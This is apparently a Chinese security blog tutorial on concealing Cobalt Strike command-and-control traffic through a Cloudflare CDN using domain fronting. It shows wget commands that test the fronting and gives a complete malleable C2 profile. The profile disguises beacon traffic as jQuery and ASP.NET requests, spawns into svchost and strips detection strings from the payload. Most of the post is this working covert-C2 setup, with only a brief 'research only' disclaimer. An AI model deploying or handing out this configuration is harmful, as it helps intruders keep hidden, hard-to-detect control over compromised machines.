前期准备
- 国外VPS,用于放置 teamserver
- 谷歌邮箱账号
- cloudflare.com/ 免费cdn
- cobalt strike
将cdn绑定teamserver的ip,之后,启动teamserver +profile
域前置原理
正常情况下
在cs上上传个HTML文件
用wget下载访问
wget -U demo -q -O - http://target.com/index.html
hello world!!!
访问返回结果
如果出现522代表cdn未生效
利用header头让cdn跳转到指定的服务器
wget -U demo -q -O - http://arya.ns.cloudflare.com/index.html --header "Host: target.com"
访问下载,返回结果
hello world!!!我们可以通过修复cs的配置文件,强制让cdn跳转到我们指定的域名
cs的配置文件原理
请求过程
-
首先由客户端发起请求经过cdn,之后通过header跳转到我们指定的域名
(需要在http-get的添加header头,还有http-post添加header头,这样使get和post都按照设置好的规则去走流量) - server端接收到get数据,并按照设置的header头,去跳转到我们的服务器
- 由server持续通信,需要用到分段传输,(重要)(http-stager这个规则主要是为了上线来设定,需要在上面添加header头,重定向到我们的服务)
之后完成的c2的配置文件
cdn.profile
#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#
https-certificate {
set keystore "./cobaltstrike.store";
set password "123456";
set L "Mountain View";
set C "US";
set ST "CA";
set CN "jquery.com";
set O "jQuery";
set OU "Certificate Authority";
set validity "365";
}
# SpawnTo,选择对应位数的程序,不能带有UAC权限,最好是通常也会跟外部进行网络通信的程序
# 这里没有找到合适的x64程序(启动不了),还是用默认的rundll32.exe
#set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
#set spawnto_x64 "%windir%\\System32\\spoolsv.exe -k netsvcs";
post-ex{
set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
}
# 分段传输
set host_stage "true"; # 使用http、https、DNS上线的主机,将会使用stagers.set
set sleeptime "5000";
set jitter "35";
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";
http-get {
set uri "/Sample/DownloadFile";
client {
header "Host" "cdn.target.com
";
header "Cookie" "ASP.NET_SessionId=zywxteesnq4eryyslpnestmn";
header "Referer" "https://cdn.target.com
";
metadata {
base64url;
parameter "fileName";
}
parameter "relativeUrl" "/Scripts/jquery.min.js";
parameter "v" "js";
parameter "s" "0.4456841254";
}
server {
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "X-Frame-Options" "SAMEORIGIN";
header "X-UA-Compatible" "IE=edge";
output {
netbios;
prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a { margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
append "</td></tr><tr><td> </td><td></td></tr><tr><td> </td><td></tr></table></body></html>";
print;
}
}
}
http-post {
set uri "/Sample/UploadFile";
set verb "GET";
client {
header "Host" "cdn.target.com
";
header "Accept" "*/*";
header "Content-Type" "multipart/form-data";
header "Referer" "https://cdn.target.com
";
output {
base64url;
parameter "fileName";
}
parameter "relativeUrl" "/upload/";
parameter "s" "0.4456841254";
id {
base64url;
parameter "v";
}
}
server {
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "X-Frame-Options" "SAMEORIGIN";
header "X-UA-Compatible" "IE=edge";
output {
netbios;
prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a { margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
append "</td></tr><tr><td> </td><td></td></tr><tr><td> </td><td></tr></table></body></html>";
print;
}
}
}
# 内存指示器
stage {
set userwx "false";
set stomppe "true";
set obfuscate "true";
set name "srv.dll";
set cleanup "true";
# Values captured using peclone agaist a Windows 10 version of explorer.exe
set checksum "0";
#set compile_time "18 Sep 2013 06:49:18";
set entry_point "650688";
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# CS 3.12 "Obfuscate and Sleep" for HTTP Beacons
set sleep_mask "true";
transform-x86 { # transform the x86 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend null bytes
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
}
transform-x64 { # transform the x64 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend null bytes
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "beacon.x64.dll" ""; # Remove this text
}
stringw "jQuery"; # Add string to binary
}
http-stager {
client {
header "Host" "cdn.target.com
";
header "Accept-Encoding" "gzip, deflate";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Referer" "https://cdn.target.com
";
}
server {
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "X-Frame-Options" "SAMEORIGIN";
header "X-UA-Compatible" "IE=edge";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a { margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
append "</td></tr><tr><td> </td><td></td></tr><tr><td> </td><td></tr></table></body></html>";
print;
}
}
}
注意只能使用http
参考
cdn上线
https://www.chainnews.com/articles/348984046030.htm
https://evi1cg.me/archives/Domain_Fronting.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论